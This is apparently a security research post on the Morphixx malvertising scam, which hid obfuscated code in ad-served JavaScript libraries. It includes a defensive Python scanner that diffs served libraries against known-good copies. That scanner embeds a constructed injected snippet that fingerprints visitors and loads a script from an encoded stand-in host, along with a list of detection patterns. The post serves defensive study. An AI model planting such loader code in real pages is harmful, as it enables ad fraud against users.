Security researchers at GeoEdge have uncovered a resurgence of the Morphixx malvertising credit card scam in early September 2024, now using a new and deceptive attack vector. In the latest attack, threat actors target mobile users in the UK and Germany with malicious code embedded within popular JavaScript libraries like TweenMax, jQuery, Edge, CSSPlugin, TweenLite, and GSAP. By leveraging the trusted reputation of Google Ad services and legitimate libraries, the attackers inserted the malicious script where it was far less likely to be detected.
These libraries, commonly used for animations, interactivity, and enhanced web experiences, have been exploited to disguise the scam’s activities, making detection more challenging. Traditional deceptive campaigns use client-side cloakers in the post-click stage to control the display of the deceptive landing page and hide it when the campaign is served in non-human environments. Morphixx instead placed the fingerprinting script in the banner pre-loading stage, controlling the display of both the banner and the landing page.
Here’s where the latest attack begins:
Flow of the Attack
- Ad Request: The publisher’s page initiates a network request to retrieve ad resources from the Google Ad Server, including legitimate libraries like jQuery.js.
- Ad Response: The server returns the ad content. Within the jQuery.js file, hidden obfuscated malicious code is embedded.
- Rendering and Fingerprint: The browser renders the fake ad and executes the embedded malicious script, which includes client-side fingerprinting to filter out bots and target specific audiences. The following stages only affect targeted users.
- Misleading Malicious Request: For targeted users, the browser makes a network request to a seemingly legitimate JavaScript library, but this time from a malicious domain.
- Ad Cloaking: The returned script, an obfuscated malicious payload, replaces the fake ad with a financial scam ad. Clicking on this malicious ad redirects the user to a cloaker domain, which disguises its true intent by using server-side fingerprinting to deliver different content tailored to the targeted user profiles.
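As an added defensive example (not GeoEdge's code or tooling), the following Python checks a served copy of a library against a known-good copy: it compares SHA-256 hashes and, on mismatch, isolates the inserted segment sitting between the unchanged start and end of the library and flags indicators such as bot-fingerprinting calls and dynamic script loading. The library text and the injected segment are constructed stand-ins, not the real jQuery.js or the Morphixx payload.

```python
import hashlib
import re

# Constructed stand-ins (not real jQuery.js, not the Morphixx code): a tiny
# "library" and the same file with a segment injected before its closing lines.
KNOWN_GOOD = "/*! lib v1 */\n(function(w){w.lib={v:'1'};})(window);\n"
SERVED = ("/*! lib v1 */\n(function(w){w.lib={v:'1'};"
          "if(!navigator.webdriver&&/Mobile/.test(navigator.userAgent)){"
          "var s=document.createElement('script');"
          "s.src=atob('aHR0cHM6Ly9leGFtcGxlLmludmFsaWQvanF1ZXJ5LmpzCg==');"  # example.invalid
          "document.head.appendChild(s);}"
          "})(window);\n")

# Indicators worth a closer look when they appear in the injected segment only.
SUSPICIOUS = [r"\beval\(", r"\batob\(", r"new Function\(", r"navigator\.webdriver",
              r"navigator\.userAgent", r"createElement\(['\"]script['\"]\)", r"debugger"]

def sha256(text):
    return hashlib.sha256(text.encode()).hexdigest()

def injected_segment(known_good, served):
    """Return the text present in `served` but absent from the known-good copy,
    found by stripping the longest common prefix and the longest common suffix."""
    if served == known_good:
        return ""
    limit = min(len(known_good), len(served))
    p = 0
    while p < limit and known_good[p] == served[p]:
        p += 1
    s = 0
    while s < limit - p and known_good[-1 - s] == served[-1 - s]:
        s += 1
    return served[p:len(served) - s]

def scan(known_good, served):
    """Hash check first; on mismatch, isolate the extra code and list indicators."""
    if sha256(served) == sha256(known_good):
        return {"tampered": False, "segment": "", "indicators": []}
    seg = injected_segment(known_good, served)
    hits = [pat for pat in SUSPICIOUS if re.search(pat, seg)]
    return {"tampered": True, "segment": seg, "indicators": hits}

if __name__ == "__main__":
    print(scan(KNOWN_GOOD, SERVED))
```

Pinning a known-good hash per library version is the cheap check; the segment isolation is what turns a bare mismatch into something an analyst can read.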
Below is an example of the seemingly legitimate request for the popular JavaScript library ‘jQuery.js’ from the Google Ad Server, along with the manipulated response containing the hidden threat.
The Request:
The Response:
Start Code:
Malicious Code Between:
End Code:
Examples of Fake and Malicious Ads:
Example 1:
Fake and Malicious Ad:
Clicking on the Fake Ad leads to:
Clicking on the Malicious Ad leads to:
Example 2:
Clicking on the Fake Ad leads to:
Clicking on the Malicious Ad leads to:
Example 3:
Clicking on the Fake Ad leads to:
Clicking on the Malicious Ad leads to a Cloaker:
Fake BBC Website vs Real BBC:
The attack employed a range of sophisticated techniques to evade detection and maximize its impact. These techniques include:
- Obfuscation
- Anti-Debug Functions
- Client-Side Fingerprint
- Server-Side Fingerprint
- Cloaked Content
- Dynamic Content Loading
- Code injection
- Malicious Redirects
Content updated on Sept 5, 2024. Read past research on Morphixx here.